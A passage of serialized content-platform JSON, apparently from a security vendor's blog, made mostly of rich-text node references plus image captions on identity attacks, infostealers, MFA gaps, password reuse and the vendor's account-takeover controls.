066],{"nodeType":178,"data":207067,"content":207068},{},[207069,207073],{"nodeType":173,"value":196838,"marks":207070,"data":207072},[207071],{"type":370},{},{"nodeType":173,"value":196843,"marks":207074,"data":207075},[],{},{"nodeType":254,"data":207077,"content":207078},{},[207079],{"nodeType":178,"data":207080,"content":207081},{},[207082,207086],{"nodeType":173,"value":196853,"marks":207083,"data":207085},[207084],{"type":370},{},{"nodeType":173,"value":196858,"marks":207087,"data":207088},[],{},{"nodeType":312,"data":207090,"content":207093},{"target":207091},{"sys":207092},{"id":196865,"type":317,"linkType":318},[],{"nodeType":169,"data":207095,"content":207096},{},[207097],{"nodeType":173,"value":196871,"marks":207098,"data":207099},[],{},{"nodeType":178,"data":207101,"content":207102},{},[207103,207106,207112,207115,207119,207122,207126,207129,207133],{"nodeType":173,"value":196878,"marks":207104,"data":207105},[],{},{"nodeType":186,"data":207107,"content":207108},{"uri":196883},[207109],{"nodeType":173,"value":18649,"marks":207110,"data":207111},[],{},{"nodeType":173,"value":196889,"marks":207113,"data":207114},[],{},{"nodeType":173,"value":196893,"marks":207116,"data":207118},[207117],{"type":370},{},{"nodeType":173,"value":2936,"marks":207120,"data":207121},[],{},{"nodeType":173,"value":196901,"marks":207123,"data":207125},[207124],{"type":370},{},{"nodeType":173,"value":196906,"marks":207127,"data":207128},[],{},{"nodeType":173,"value":138,"marks":207130,"data":207132},[207131],{"type":370},{},{"nodeType":173,"value":196914,"marks":207134,"data":207135},[],{},{"nodeType":312,"data":207137,"content":207140},{"target":207138},{"sys":207139},{"id":196921,"type":317,"linkType":318},[],{"nodeType":235,"data":207142,"content":207143},{},[207144],{"nodeType":173,"value":196927,"marks":207145,"data":207146},[],{},{"nodeType":178,"data":207148,"content":207149},{},[207150,207153,207159],{"nodeType":173,"value":196934,"marks":207151,"data":207152},[],{},{"nodeType":186,"data":207154,"content":207155},{"uri":473},[207156],{"nodeType":173,"value":88194,"marks":207157,"data":207158},[],{},{"nodeType":173,"value":196944,"marks":207160,"data":207161},[],{},{"nodeType":312,"data":207163,"content":207166},{"target":207164},{"sys":207165},{"id":196951,"type":317,"linkType":318},[],{"nodeType":178,"data":207168,"content":207169},{},[207170],{"nodeType":173,"value":37,"marks":207171,"data":207172},[],{},{"entries":207174},{"hyperlink":207175,"inline":207176,"block":207177},[],[],[207178,207185,207193,207196,207203,207208,207211,207217,207220,207226,207229,207232,207239,207246,207252,207258,207266,207274],{"sys":207179,"__typename":5345,"title":207180,"caption":207181,"layoutMode":118,"file":207182},{"id":195791},"DBIR stolen credentials graphic","Identity attack techniques were by far the most prevalent initial access vectors in this year's Verizon DBIR.",{"url":207183,"width":207184,"height":129843},"https://images.ctfassets.net/y1cdw1ablpvd/QCYpzmm2CKDnBI1KZXJv9/3b9b565137fc91fb447bf8c611db6d5e/Group_343.png",370,{"sys":207186,"__typename":5345,"title":207187,"caption":207188,"layoutMode":118,"file":207189},{"id":195835},"Identity breach timeline","The rise in identity attacks should come as no surprise to any of us. While attackers are bad people, they’re still mostly rational bad people who will take the easy road.",{"url":207190,"width":207191,"height":207192},"https://images.ctfassets.net/y1cdw1ablpvd/4EoLhIzCo8VythFPqt0tIA/460d6b2fdab727fe4036569a2505aedd/image1.png",1768,994,{"sys":207194,"__typename":15269,"type":15270,"ctaText":207195,"buttonLabel":123357,"buttonColour":152046,"buttonUrl":118063},{"id":195841},"Learn more about the timeline of recent identity attacks in the wild.",{"sys":207197,"__typename":5345,"title":207198,"caption":207199,"layoutMode":118,"file":207200},{"id":195861},"Comparing attack paths for identity, network, and endpoint attacks. ","Attackers are now targeting identities to avoid established endpoint and network security controls. ",{"url":207201,"width":207202,"height":179225},"https://images.ctfassets.net/y1cdw1ablpvd/2ZleNOvt5jsBQ7RTds5BBN/f73fe9434abb44914ba339d2d94860e6/image10.png",1201,{"sys":207204,"__typename":5345,"title":207205,"caption":207206,"layoutMode":118,"file":207207},{"id":195908},"How Push prevents account takeover","Push prevents account takeover using controls aligned with each stage of the attack chain.",{"url":206117,"width":121106,"height":49163},{"sys":207209,"__typename":5345,"title":142409,"caption":142410,"layoutMode":118,"file":207210},{"id":128839},{"url":142412,"width":142413,"height":142414},{"sys":207212,"__typename":5345,"title":207213,"caption":207214,"layoutMode":118,"file":207215},{"id":196074},"SSO Password Protection","Push blocks malicious logins before the user can be phished.",{"url":207216,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/NswNmrq9QBqinx9ssS2Fz/18b4cdf6c4bff3274c289a4185b4204f/image5.png",{"sys":207218,"__typename":5345,"title":121096,"caption":121097,"layoutMode":118,"file":207219},{"id":98287},{"url":121099,"width":23880,"height":19654},{"sys":207221,"__typename":5345,"title":207222,"caption":207222,"layoutMode":118,"file":207223},{"id":196342},"The 2024 Sophos Threat Report shows the prevalence of info stealer malware.",{"url":207224,"width":40,"height":207225},"https://images.ctfassets.net/y1cdw1ablpvd/ntLmjUBbgKFILEraHAiLC/dbefc5df68c0260dd6301237af4ba49a/image3.png",432,{"sys":207227,"__typename":15269,"type":15270,"ctaText":207228,"buttonLabel":123357,"buttonColour":15273,"buttonUrl":126102},{"id":196385},"For more information on infostealers, check out our recent blog post.",{"sys":207230,"__typename":5345,"title":121109,"caption":121109,"layoutMode":118,"file":207231},{"id":105035},{"url":121111,"width":23880,"height":100678},{"sys":207233,"__typename":5345,"title":207234,"caption":207235,"layoutMode":118,"file":207236},{"id":196452},"Stolen creds example","Viewing stolen credentials using the Push platform.",{"url":207237,"width":168031,"height":207238},"https://images.ctfassets.net/y1cdw1ablpvd/5BJQtkoIy6xBSgYRTzMhgh/121f277cdb6684b4441d8c0e98241077/stolen_creds_example.png",919,{"sys":207240,"__typename":5345,"title":207241,"caption":207242,"layoutMode":118,"file":207243},{"id":196661},"Identifying MFA gaps with Push","Identifying MFA gaps with Push.",{"url":207244,"width":207245,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/xfT8Naxqz8UHj9NfMoB3c/205590adc81044c474f91e94ed1491ba/image2.png",1797,{"sys":207247,"__typename":5345,"title":207248,"caption":207249,"layoutMode":118,"file":207250},{"id":196674},"MFA enforcement banner","Push MFA enforcement banner.",{"url":207251,"width":23880,"height":113559},"https://images.ctfassets.net/y1cdw1ablpvd/3gU1uqYKTUcYnS86z5KNcf/8d91db345ab6bbfa36ae551a4709822d/mfa_enforcement_banner_web.png",{"sys":207253,"__typename":5345,"title":207254,"caption":207255,"layoutMode":118,"file":207256},{"id":196701},"Password reuse identified and reported","Password reuse identified and reported.",{"url":207257,"width":173172,"height":134183},"https://images.ctfassets.net/y1cdw1ablpvd/5gkK5ubIQzC7dAory22d7u/8d7a7791e376eae26bec69f0bc66f838/chatops_reused_password_finding_20230713.png",{"sys":207259,"__typename":5345,"title":207260,"caption":207261,"layoutMode":118,"file":207262},{"id":196865},"Preventing password logins where SSO is supported","Preventing password logins where SSO is supported. ",{"url":207263,"width":207264,"height":207265},"https://images.ctfassets.net/y1cdw1ablpvd/1epd5VHOflUX67ga5lZA7z/8f179c8621d9d60bd6a8879c9b0daea5/image9.png",1255,763,{"sys":207267,"__typename":5345,"title":207268,"caption":207269,"layoutMode":118,"file":207270},{"id":196921},"Controls page","Enable controls to stop account takeover with the push of a button.",{"url":207271,"width":207272,"height":207273},"https://images.ctfassets.net/y1cdw1ablpvd/7HVWDgFFdpHxzzNDpgcnLs/520e7c0a9c76bbafaa538d5f24720826/controls_page_20240808.png",3022,1716,{"sys":207275,"__typename":15269,"type":15270,"ctaText":207276,"buttonLabel":123357,"buttonColour":72847,"buttonUrl":188},{"id":196951},"Learn more about our design philosophy and what makes our account takeover defenses uniquely effective.",{"items":207278},[207279,207846,208336],{"__typename":1528,"sys":207280,"content":207281,"title":75144,"synopsis":75145,"hashTags":118,"publishedDate":75146,"slug":75147,"tagsCollection":207836,"authorsCollection":207842},{"id":74493},{"json":207282},{"nodeType":165,"data":207283,"content":207284},{},[207285,207291,207297,207317,207322,207328,207334,207337,207343,207359,207364,207370,207403,207409,207415,207421,207427,207433,207439,207454,207461,207464,207470,207476,207482,207488,207494,207500,207506,207548,207554,207560,207566,207582,207588,207594,207600,207606,207612,207618,207624,207639,207654,207693,207699,207705,207762,207768,207771,207777,207790,207805,207811,207816,207821,207824,207830],{"nodeType":178,"data":207286,"content":207287},{},[207288],{"nodeType":173,"value":74502,"marks":207289,"data":207290},[],{},{"nodeType":178,"data":207292,"content":207293},{},[207294],{"nodeType":173,"value":74509,"marks":207295,"data":207296},[],{},{"nodeType":178,"data":207298,"content":207299},{},[207300,207303,207310,207313],{"nodeType":173,"value":74516,"marks":207301,"data":207302},[],{},{"nodeType":186,"data":207304,"content":207305},{"uri":74521},[207306],{"nodeType":173,"value":74524,"marks":207307,"data":207309},[207308],{"type":194},{},{"nodeType":173,"value":74529,"marks":207311,"data":207312},[],{},{"nodeType":173,"value":74533,"marks":207314,"data":207316},[207315],{"type":370},{},{"nodeType":312,"data":207318,"content":207321},{"target":207319},{"sys":207320},{"id":74541,"type":317,"linkType":318},[],{"nodeType":178,"data":207323,"content":207324},{},[207325],{"nodeType":173,"value":74547,"marks":207326,"data":207327},[],{},{"nodeType":178,"data":207329,"content":207330},{},[207331],{"nodeType":173,"value":74554,"marks":207332,"data":207333},[],{},{"nodeType":231,"data":207335,"content":207336},{},[],{"nodeType":169,"data":207338,"content":207339},{},[207340],{"nodeType":173,"value":74564,"marks":207341,"data":207342},[],{},{"nodeType":178,"data":207344,"content":207345},{},[207346,207349,207356],{"nodeType":173,"value":74571,"marks":207347,"data":207348},[],{},{"nodeType":186,"data":207350,"content":207351},{"uri":74576},[207352],{"nodeType":173,"value":74579,"marks":207353,"data":207355},[207354],{"type":194},{},{"nodeType":173,"value":74584,"marks":207357,"data":207358},[],{},{"nodeType":312,"data":207360,"content":207363},{"target":207361},{"sys":207362},{"id":74591,"type":317,"linkType":318},[],{"nodeType":178,"data":207365,"content":207366},{},[207367],{"nodeType":173,"value":74597,"marks":207368,"data":207369},[],{},{"nodeType":178,"data":207371,"content":207372},{},[207373,207376,207382,207385,207391,207394,207400],{"nodeType":173,"value":74604,"marks":207374,"data":207375},[],{},{"nodeType":186,"data":207377,"content":207378},{"uri":74609},[207379],{"nodeType":173,"value":74612,"marks":207380,"data":207381},[],{},{"nodeType":173,"value":74616,"marks":207383,"data":207384},[],{},{"nodeType":186,"data":207386,"content":207387},{"uri":74621},[207388],{"nodeType":173,"value":74624,"marks":207389,"data":207390},[],{},{"nodeType":173,"value":74628,"marks":207392,"data":207393},[],{},{"nodeType":186,"data":207395,"content":207396},{"uri":3999},[207397],{"nodeType":173,"value":74635,"marks":207398,"data":207399},[],{},{"nodeType":173,"value":74639,"marks":207401,"data":207402},[],{},{"nodeType":178,"data":207404,"content":207405},{},[207406],{"nodeType":173,"value":74646,"marks":207407,"data":207408},[],{},{"nodeType":235,"data":207410,"content":207411},{},[207412],{"nodeType":173,"value":74653,"marks":207413,"data":207414},[],{},{"nodeType":178,"data":207416,"content":207417},{},[207418],{"nodeType":173,"value":74660,"marks":207419,"data":207420},[],{},{"nodeType":178,"data":207422,"content":207423},{},[207424],{"nodeType":173,"value":74667,"marks":207425,"data":207426},[],{},{"nodeType":178,"data":207428,"content":207429},{},[207430],{"nodeType":173,"value":74674,"marks":207431,"data":207432},[],{},{"nodeType":178,"data":207434,"content":207435},{},[207436],{"nodeType":173,"value":74681,"marks":207437,"data":207438},[],{},{"nodeType":178,"data":207440,"content":207441},{},[207442,207445,207451],{"nodeType":173,"value":74688,"marks":207443,"data":207444},[],{},{"nodeType":186,"data":207446,"content":207447},{"uri":74693},[207448],{"nodeType":173,"value":74696,"marks":207449,"data":207450},[],{},{"nodeType":173,"value":74700,"marks":207452,"data":207453},[],{},{"nodeType":178,"data":207455,"content":207456},{},[207457],{"nodeType":173,"value":74707,"marks":207458,"data":207460},[207459],{"type":370},{},{"nodeType":231,"data":207462,"content":207463},{},[],{"nodeType":169,"data":207465,"content":207466},{},[207467],{"nodeType":173,"value":74718,"marks":207468,"data":207469},[],{},{"nodeType":178,"data":207471,"content":207472},{},[207473],{"nodeType":173,"value":74725,"marks":207474,"data":207475},[],{},{"nodeType":178,"data":207477,"content":207478},{},[207479],{"nodeType":173,"value":74732,"marks":207480,"data":207481},[],{},{"nodeType":178,"data":207483,"content":207484},{},[207485],{"nodeType":173,"value":74739,"marks":207486,"data":207487},[],{},{"nodeType":178,"data":207489,"content":207490},{},[207491],{"nodeType":173,"value":74746,"marks":207492,"data":207493},[],{},{"nodeType":235,"data":207495,"content":207496},{},[207497],{"nodeType":173,"value":74753,"marks":207498,"data":207499},[],{},{"nodeType":178,"data":207501,"content":207502},{},[207503],{"nodeType":173,"value":74760,"marks":207504,"data":207505},[],{},{"nodeType":250,"data":207507,"content":207508},{},[207509,207522,207535],{"nodeType":254,"data":207510,"content":207511},{},[207512],{"nodeType":178,"data":207513,"content":207514},{},[207515,207519],{"nodeType":173,"value":74773,"marks":207516,"data":207518},[207517],{"type":370},{},{"nodeType":173,"value":74778,"marks":207520,"data":207521},[],{},{"nodeType":254,"data":207523,"content":207524},{},[207525],{"nodeType":178,"data":207526,"content":207527},{},[207528,207532],{"nodeType":173,"value":74788,"marks":207529,"data":207531},[207530],{"type":370},{},{"nodeType":173,"value":74793,"marks":207533,"data":207534},[],{},{"nodeType":254,"data":207536,"content":207537},{},[207538],{"nodeType":178,"data":207539,"content":207540},{},[207541,207545],{"nodeType":173,"value":74803,"marks":207542,"data":207544},[207543],{"type":370},{},{"nodeType":173,"value":74808,"marks":207546,"data":207547},[],{},{"nodeType":178,"data":207549,"content":207550},{},[207551],{"nodeType":173,"value":74815,"marks":207552,"data":207553},[],{},{"nodeType":235,"data":207555,"content":207556},{},[207557],{"nodeType":173,"value":74822,"marks":207558,"data":207559},[],{},{"nodeType":178,"data":207561,"content":207562},{},[207563],{"nodeType":173,"value":74829,"marks":207564,"data":207565},[],{},{"nodeType":178,"data":207567,"content":207568},{},[207569,207572,207579],{"nodeType":173,"value":74836,"marks":207570,"data":207571},[],{},{"nodeType":186,"data":207573,"content":207574},{"uri":74841},[207575],{"nodeType":173,"value":74844,"marks":207576,"data":207578},[207577],{"type":194},{},{"nodeType":173,"value":74849,"marks":207580,"data":207581},[],{},{"nodeType":178,"data":207583,"content":207584},{},[207585],{"nodeType":173,"value":74856,"marks":207586,"data":207587},[],{},{"nodeType":235,"data":207589,"content":207590},{},[207591],{"nodeType":173,"value":74863,"marks":207592,"data":207593},[],{},{"nodeType":178,"data":207595,"content":207596},{},[207597],{"nodeType":173,"value":74870,"marks":207598,"data":207599},[],{},{"nodeType":178,"data":207601,"content":207602},{},[207603],{"nodeType":173,"value":74877,"marks":207604,"data":207605},[],{},{"nodeType":178,"data":207607,"content":207608},{},[207609],{"nodeType":173,"value":74884,"marks":207610,"data":207611},[],{},{"nodeType":235,"data":207613,"content":207614},{},[207615],{"nodeType":173,"value":74891,"marks":207616,"data":207617},[],{},{"nodeType":178,"data":207619,"content":207620},{},[207621],{"nodeType":173,"value":74898,"marks":207622,"data":207623},[],{},{"nodeType":178,"data":207625,"content":207626},{},[207627,207630,207636],{"nodeType":173,"value":74905,"marks":207628,"data":207629},[],{},{"nodeType":186,"data":207631,"content":207632},{"uri":9099},[207633],{"nodeType":173,"value":74912,"marks":207634,"data":207635},[],{},{"nodeType":173,"value":1477,"marks":207637,"data":207638},[],{},{"nodeType":178,"data":207640,"content":207641},{},[207642,207645,207651],{"nodeType":173,"value":74922,"marks":207643,"data":207644},[],{},{"nodeType":186,"data":207646,"content":207647},{"uri":74693},[207648],{"nodeType":173,"value":74929,"marks":207649,"data":207650},[],{},{"nodeType":173,"value":39946,"marks":207652,"data":207653},[],{},{"nodeType":250,"data":207655,"content":207656},{},[207657,207666,207675,207684],{"nodeType":254,"data":207658,"content":207659},{},[207660],{"nodeType":178,"data":207661,"content":207662},{},[207663],{"nodeType":173,"value":74945,"marks":207664,"data":207665},[],{},{"nodeType":254,"data":207667,"content":207668},{},[207669],{"nodeType":178,"data":207670,"content":207671},{},[207672],{"nodeType":173,"value":74955,"marks":207673,"data":207674},[],{},{"nodeType":254,"data":207676,"content":207677},{},[207678],{"nodeType":178,"data":207679,"content":207680},{},[207681],{"nodeType":173,"value":74965,"marks":207682,"data":207683},[],{},{"nodeType":254,"data":207685,"content":207686},{},[207687],{"nodeType":178,"data":207688,"content":207689},{},[207690],{"nodeType":173,"value":74975,"marks":207691,"data":207692},[],{},{"nodeType":178,"data":207694,"content":207695},{},[207696],{"nodeType":173,"value":74982,"marks":207697,"data":207698},[],{},{"nodeType":178,"data":207700,"content":207701},{},[207702],{"nodeType":173,"value":74989,"marks":207703,"data":207704},[],{},{"nodeType":250,"data":207706,"content":207707},{},[207708,207726,207744],{"nodeType":254,"data":207709,"content":207710},{},[207711],{"nodeType":178,"data":207712,"content":207713},{},[207714,207717,207723],{"nodeType":173,"value":75002,"marks":207715,"data":207716},[],{},{"nodeType":186,"data":207718,"content":207719},{"uri":9099},[207720],{"nodeType":173,"value":75009,"marks":207721,"data":207722},[],{},{"nodeType":173,"value":197,"marks":207724,"data":207725},[],{},{"nodeType":254,"data":207727,"content":207728},{},[207729],{"nodeType":178,"data":207730,"content":207731},{},[207732,207735,207741],{"nodeType":173,"value":75022,"marks":207733,"data":207734},[],{},{"nodeType":186,"data":207736,"content":207737},{"uri":75027},[207738],{"nodeType":173,"value":75030,"marks":207739,"data":207740},[],{},{"nodeType":173,"value":37,"marks":207742,"data":207743},[],{},{"nodeType":254,"data":207745,"content":207746},{},[207747],{"nodeType":178,"data":207748,"content":207749},{},[207750,207753,207759],{"nodeType":173,"value":75043,"marks":207751,"data":207752},[],{},{"nodeType":186,"data":207754,"content":207755},{"uri":75048},[207756],{"nodeType":173,"value":75051,"marks":207757,"data":207758},[],{},{"nodeType":173,"value":197,"marks":207760,"data":207761},[],{},{"nodeType":178,"data":207763,"content":207764},{},[207765],{"nodeType":173,"value":75061,"marks":207766,"data":207767},[],{},{"nodeType":231,"data":207769,"content":207770},{},[],{"nodeType":169,"data":207772,"content":207773},{},[207774],{"nodeType":173,"value":75071,"marks":207775,"data":207776},[],{},{"nodeType":178,"data":207778,"content":207779},{},[207780,207783,207787],{"nodeType":173,"value":75078,"marks":207781,"data":207782},[],{},{"nodeType":173,"value":75082,"marks":207784,"data":207786},[207785],{"type":370},{},{"nodeType":173,"value":75087,"marks":207788,"data":207789},[],{},{"nodeType":178,"data":207791,"content":207792},{},[207793,207796,207802],{"nodeType":173,"value":75094,"marks":207794,"data":207795},[],{},{"nodeType":186,"data":207797,"content":207798},{"uri":75099},[207799],{"nodeType":173,"value":75102,"marks":207800,"data":207801},[],{},{"nodeType":173,"value":75106,"marks":207803,"data":207804},[],{},{"nodeType":178,"data":207806,"content":207807},{},[207808],{"nodeType":173,"value":75113,"marks":207809,"data":207810},[],{},{"nodeType":312,"data":207812,"content":207815},{"target":207813},{"sys":207814},{"id":75120,"type":317,"linkType":318},[],{"nodeType":312,"data":207817,"content":207820},{"target":207818},{"sys":207819},{"id":75126,"type":317,"linkType":318},[],{"nodeType":231,"data":207822,"content":207823},{},[],{"nodeType":169,"data":207825,"content":207826},{},[207827],{"nodeType":173,"value":40632,"marks":207828,"data":207829},[],{},{"nodeType":178,"data":207831,"content":207832},{},[207833],{"nodeType":173,"value":75141,"marks":207834,"data":207835},[],{},{"items":207837},[207838,207840],{"sys":207839,"name":509},{"id":508},{"sys":207841,"name":505},{"id":504},{"items":207843},[207844],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":207845},{"url":1496},{"__typename":1528,"sys":207847,"content":207848,"title":140545,"synopsis":140546,"hashTags":118,"publishedDate":140547,"slug":140548,"tagsCollection":208326,"authorsCollection":208332},{"id":139982},{"json":207849},{"data":207850,"content":207851,"nodeType":165},{},[207852,207868,207884,207890,207895,207901,207907,207913,207919,207926,207942,207948,207954,207960,207965,207971,207997,208003,208009,208015,208021,208026,208032,208038,208044,208070,208075,208081,208087,208113,208118,208124,208130,208136,208142,208147,208152,208158,208164,208170,208175,208181,208187,208193,208199,208215,208228,208234,208240,208246,208251,208257,208273,208278,208284,208307,208313,208319],{"data":207853,"content":207854,"nodeType":178},{},[207855,207858,207865],{"data":207856,"marks":207857,"value":139993,"nodeType":173},{},[],{"data":207859,"content":207860,"nodeType":186},{"uri":118063},[207861],{"data":207862,"marks":207863,"value":140001,"nodeType":173},{},[207864],{"type":194},{"data":207866,"marks":207867,"value":140005,"nodeType":173},{},[],{"data":207869,"content":207870,"nodeType":178},{},[207871,207874,207881],{"data":207872,"marks":207873,"value":140012,"nodeType":173},{},[],{"data":207875,"content":207876,"nodeType":186},{"uri":49844},[207877],{"data":207878,"marks":207879,"value":140020,"nodeType":173},{},[207880],{"type":194},{"data":207882,"marks":207883,"value":140024,"nodeType":173},{},[],{"data":207885,"content":207886,"nodeType":178},{},[207887],{"data":207888,"marks":207889,"value":140031,"nodeType":173},{},[],{"data":207891,"content":207894,"nodeType":312},{"target":207892},{"sys":207893},{"id":140036,"type":317,"linkType":318},[],{"data":207896,"content":207897,"nodeType":178},{},[207898],{"data":207899,"marks":207900,"value":140044,"nodeType":173},{},[],{"data":207902,"content":207903,"nodeType":169},{},[207904],{"data":207905,"marks":207906,"value":140051,"nodeType":173},{},[],{"data":207908,"content":207909,"nodeType":178},{},[207910],{"data":207911,"marks":207912,"value":140058,"nodeType":173},{},[],{"data":207914,"content":207915,"nodeType":178},{},[207916],{"data":207917,"marks":207918,"value":140065,"nodeType":173},{},[],{"data":207920,"content":207921,"nodeType":178},{},[207922],{"data":207923,"marks":207924,"value":140073,"nodeType":173},{},[207925],{"type":13816},{"data":207927,"content":207928,"nodeType":178},{},[207929,207932,207939],{"data":207930,"marks":207931,"value":140080,"nodeType":173},{},[],{"data":207933,"content":207934,"nodeType":186},{"uri":140083},[207935],{"data":207936,"marks":207937,"value":140089,"nodeType":173},{},[207938],{"type":194},{"data":207940,"marks":207941,"value":1477,"nodeType":173},{},[],{"data":207943,"content":207944,"nodeType":169},{},[207945],{"data":207946,"marks":207947,"value":140099,"nodeType":173},{},[],{"data":207949,"content":207950,"nodeType":178},{},[207951],{"data":207952,"marks":207953,"value":140106,"nodeType":173},{},[],{"data":207955,"content":207956,"nodeType":178},{},[207957],{"data":207958,"marks":207959,"value":140113,"nodeType":173},{},[],{"data":207961,"content":207964,"nodeType":312},{"target":207962},{"sys":207963},{"id":129117,"type":317,"linkType":318},[],{"data":207966,"content":207967,"nodeType":178},{},[207968],{"data":207969,"marks":207970,"value":140125,"nodeType":173},{},[],{"data":207972,"content":207973,"nodeType":178},{},[207974,207977,207984,207987,207994],{"data":207975,"marks":207976,"value":140132,"nodeType":173},{},[],{"data":207978,"content":207979,"nodeType":186},{"uri":140135},[207980],{"data":207981,"marks":207982,"value":140141,"nodeType":173},{},[207983],{"type":194},{"data":207985,"marks":207986,"value":140145,"nodeType":173},{},[],{"data":207988,"content":207989,"nodeType":186},{"uri":140148},[207990],{"data":207991,"marks":207992,"value":140154,"nodeType":173},{},[207993],{"type":194},{"data":207995,"marks":207996,"value":2340,"nodeType":173},{},[],{"data":207998,"content":207999,"nodeType":169},{},[208000],{"data":208001,"marks":208002,"value":140164,"nodeType":173},{},[],{"data":208004,"content":208005,"nodeType":178},{},[208006],{"data":208007,"marks":208008,"value":140171,"nodeType":173},{},[],{"data":208010,"content":208011,"nodeType":178},{},[208012],{"data":208013,"marks":208014,"value":140178,"nodeType":173},{},[],{"data":208016,"content":208017,"nodeType":178},{},[208018],{"data":208019,"marks":208020,"value":140185,"nodeType":173},{},[],{"data":208022,"content":208025,"nodeType":312},{"target":208023},{"sys":208024},{"id":140190,"type":317,"linkType":318},[],{"data":208027,"content":208028,"nodeType":169},{},[208029],{"data":208030,"marks":208031,"value":140198,"nodeType":173},{},[],{"data":208033,"content":208034,"nodeType":178},{},[208035],{"data":208036,"marks":208037,"value":140205,"nodeType":173},{},[],{"data":208039,"content":208040,"nodeType":169},{},[208041],{"data":208042,"marks":208043,"value":140212,"nodeType":173},{},[],{"data":208045,"content":208046,"nodeType":178},{},[208047,208050,208057,208060,208067],{"data":208048,"marks":208049,"value":140219,"nodeType":173},{},[],{"data":208051,"content":208052,"nodeType":186},{"uri":140222},[208053],{"data":208054,"marks":208055,"value":140222,"nodeType":173},{},[208056],{"type":194},{"data":208058,"marks":208059,"value":140231,"nodeType":173},{},[],{"data":208061,"content":208062,"nodeType":186},{"uri":140234},[208063],{"data":208064,"marks":208065,"value":140240,"nodeType":173},{},[208066],{"type":194},{"data":208068,"marks":208069,"value":39946,"nodeType":173},{},[],{"data":208071,"content":208074,"nodeType":312},{"target":208072},{"sys":208073},{"id":140248,"type":317,"linkType":318},[],{"data":208076,"content":208077,"nodeType":169},{},[208078],{"data":208079,"marks":208080,"value":140256,"nodeType":173},{},[],{"data":208082,"content":208083,"nodeType":178},{},[208084],{"data":208085,"marks":208086,"value":140263,"nodeType":173},{},[],{"data":208088,"content":208089,"nodeType":178},{},[208090,208093,208100,208103,208110],{"data":208091,"marks":208092,"value":140270,"nodeType":173},{},[],{"data":208094,"content":208095,"nodeType":186},{"uri":140273},[208096],{"data":208097,"marks":208098,"value":140273,"nodeType":173},{},[208099],{"type":194},{"data":208101,"marks":208102,"value":140282,"nodeType":173},{},[],{"data":208104,"content":208105,"nodeType":186},{"uri":140285},[208106],{"data":208107,"marks":208108,"value":140285,"nodeType":173},{},[208109],{"type":194},{"data":208111,"marks":208112,"value":140294,"nodeType":173},{},[],{"data":208114,"content":208117,"nodeType":312},{"target":208115},{"sys":208116},{"id":140299,"type":317,"linkType":318},[],{"data":208119,"content":208120,"nodeType":169},{},[208121],{"data":208122,"marks":208123,"value":140307,"nodeType":173},{},[],{"data":208125,"content":208126,"nodeType":178},{},[208127],{"data":208128,"marks":208129,"value":140314,"nodeType":173},{},[],{"data":208131,"content":208132,"nodeType":178},{},[208133],{"data":208134,"marks":208135,"value":140321,"nodeType":173},{},[],{"data":208137,"content":208138,"nodeType":178},{},[208139],{"data":208140,"marks":208141,"value":140328,"nodeType":173},{},[],{"data":208143,"content":208146,"nodeType":312},{"target":208144},{"sys":208145},{"id":140333,"type":317,"linkType":318},[],{"data":208148,"content":208151,"nodeType":312},{"target":208149},{"sys":208150},{"id":140339,"type":317,"linkType":318},[],{"data":208153,"content":208154,"nodeType":178},{},[208155],{"data":208156,"marks":208157,"value":140347,"nodeType":173},{},[],{"data":208159,"content":208160,"nodeType":169},{},[208161],{"data":208162,"marks":208163,"value":140354,"nodeType":173},{},[],{"data":208165,"content":208166,"nodeType":178},{},[208167],{"data":208168,"marks":208169,"value":140361,"nodeType":173},{},[],{"data":208171,"content":208174,"nodeType":312},{"target":208172},{"sys":208173},{"id":140366,"type":317,"linkType":318},[],{"data":208176,"content":208177,"nodeType":178},{},[208178],{"data":208179,"marks":208180,"value":140374,"nodeType":173},{},[],{"data":208182,"content":208183,"nodeType":178},{},[208184],{"data":208185,"marks":208186,"value":140381,"nodeType":173},{},[],{"data":208188,"content":208189,"nodeType":169},{},[208190],{"data":208191,"marks":208192,"value":140388,"nodeType":173},{},[],{"data":208194,"content":208195,"nodeType":178},{},[208196],{"data":208197,"marks":208198,"value":140395,"nodeType":173},{},[],{"data":208200,"content":208201,"nodeType":178},{},[208202,208205,208212],{"data":208203,"marks":208204,"value":140402,"nodeType":173},{},[],{"data":208206,"content":208207,"nodeType":186},{"uri":140405},[208208],{"data":208209,"marks":208210,"value":140405,"nodeType":173},{},[208211],{"type":194},{"data":208213,"marks":208214,"value":140414,"nodeType":173},{},[],{"data":208216,"content":208217,"nodeType":178},{},[208218,208221,208225],{"data":208219,"marks":208220,"value":140421,"nodeType":173},{},[],{"data":208222,"marks":208223,"value":140426,"nodeType":173},{},[208224],{"type":370},{"data":208226,"marks":208227,"value":140430,"nodeType":173},{},[],{"data":208229,"content":208230,"nodeType":169},{},[208231],{"data":208232,"marks":208233,"value":40632,"nodeType":173},{},[],{"data":208235,"content":208236,"nodeType":178},{},[208237],{"data":208238,"marks":208239,"value":140443,"nodeType":173},{},[],{"data":208241,"content":208242,"nodeType":178},{},[208243],{"data":208244,"marks":208245,"value":140450,"nodeType":173},{},[],{"data":208247,"content":208250,"nodeType":312},{"target":208248},{"sys":208249},{"id":140455,"type":317,"linkType":318},[],{"data":208252,"content":208253,"nodeType":178},{},[208254],{"data":208255,"marks":208256,"value":140463,"nodeType":173},{},[],{"data":208258,"content":208259,"nodeType":178},{},[208260,208263,208270],{"data":208261,"marks":208262,"value":140470,"nodeType":173},{},[],{"data":208264,"content":208265,"nodeType":186},{"uri":49844},[208266],{"data":208267,"marks":208268,"value":140478,"nodeType":173},{},[208269],{"type":194},{"data":208271,"marks":208272,"value":140482,"nodeType":173},{},[],{"data":208274,"content":208277,"nodeType":312},{"target":208275},{"sys":208276},{"id":140487,"type":317,"linkType":318},[],{"data":208279,"content":208280,"nodeType":169},{},[208281],{"data":208282,"marks":208283,"value":140495,"nodeType":173},{},[],{"data":208285,"content":208286,"nodeType":178},{},[208287,208290,208294,208297,208304],{"data":208288,"marks":208289,"value":140502,"nodeType":173},{},[],{"data":208291,"marks":208292,"value":140507,"nodeType":173},{},[208293],{"type":370},{"data":208295,"marks":208296,"value":140511,"nodeType":173},{},[],{"data":208298,"content":208299,"nodeType":186},{"uri":9099},[208300],{"data":208301,"marks":208302,"value":140519,"nodeType":173},{},[208303],{"type":194},{"data":208305,"marks":208306,"value":1477,"nodeType":173},{},[],{"data":208308,"content":208309,"nodeType":178},{},[208310],{"data":208311,"marks":208312,"value":140529,"nodeType":173},{},[],{"data":208314,"content":208315,"nodeType":178}